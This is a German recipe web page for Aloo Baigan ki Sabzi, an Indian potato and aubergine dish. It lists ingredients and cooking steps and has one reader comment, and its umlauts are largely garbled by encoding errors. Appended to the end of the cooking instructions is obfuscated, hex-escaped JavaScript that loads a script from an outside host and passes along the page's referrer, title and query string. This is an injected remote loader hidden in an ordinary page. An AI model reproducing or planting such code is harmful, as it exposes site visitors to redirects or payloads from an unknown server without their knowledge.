Huettenhilfe Logo

Aloo Baigan ki Sabzi (Kartoffel-Auberginen-GemA?se )

Ein pikantes, vegetarisches Gericht aus Indien. Scharfes Aloo Baigan ki Sabzi - Kartoffel-Auberginen-GemA?se auf indische Art.

Zubereitung Keine AngabeKeine Angabe Schwierigkeit einfach Bewertung
1 Star2 Stars3 Stars4 Stars5 Stars (noch keine Bewertung)
Loading ... Loading ...
  • Zutaten:
  • 6 EL Kokosraspel
  • 3 EL PflanzenA�l
  • 2- 3 cm Ingwer in Streifen
  • Garam Masala nach Geschmack
  • 1 Chilischote, fein gehackt
  • 6 Kartoffeln, geschA�lt und gewA?rfelt
  • 1 TL Salz
  • 800 ml Tomatensaft
  • 3 Auberginen in WA?rfel geschnitten
  • 1 A?a��a�? 2 EL Kokoscreme (alternative Kokosmilch)

Zubereitung:

aloo-baigan-ki-sabzi.jpg

In einer Pfanne die Kokosraspel ohne Fett goldbraun anrA�sten und dann beiseite stellen.
Das A�l in einem Topf heiAY werden lassen Garam Masala und Ingwer hineingeben und kurz anbraten.

Kokosraspel, und Chilies dazugeben, unter RA?hren mitbruzeln lassen. Kartoffeln und Salz untermischen, gut umrA?hren. Danach den Tomatensaft zugieAYen und zum Kochen bringen.

AnschlieAYend kommen die Auberginen dazu, und das Gericht bei ca. 15-20 Minuten, bei niedriger Hitzezufuhr bei aufgelegtem Deckel, gar werden lassen.

Zuletzt kommt die Kokoscreme/kokosmilch dazu und fertig ist das Aloo Baigan ki Sabzi.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

von
Mitglied seit 2006

Ein Kommentar “Rezept – Aloo Baigan ki Sabzi (Kartoffel-Auberginen-GemA?se )

  1. Hallo,
    ich würde dieses Gericht gerne einmal kochen, kann mir jemand sagen, für wie viele Personen diese Menge gedacht ist?
    Danke

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Das Hausgemacht Forum

Noch nicht das passende Rezept gefunden?
Lust auf neue Kochideeen und spannende, kulinarische Themen?
Jetzt im Hausgemacht Forum mitreden!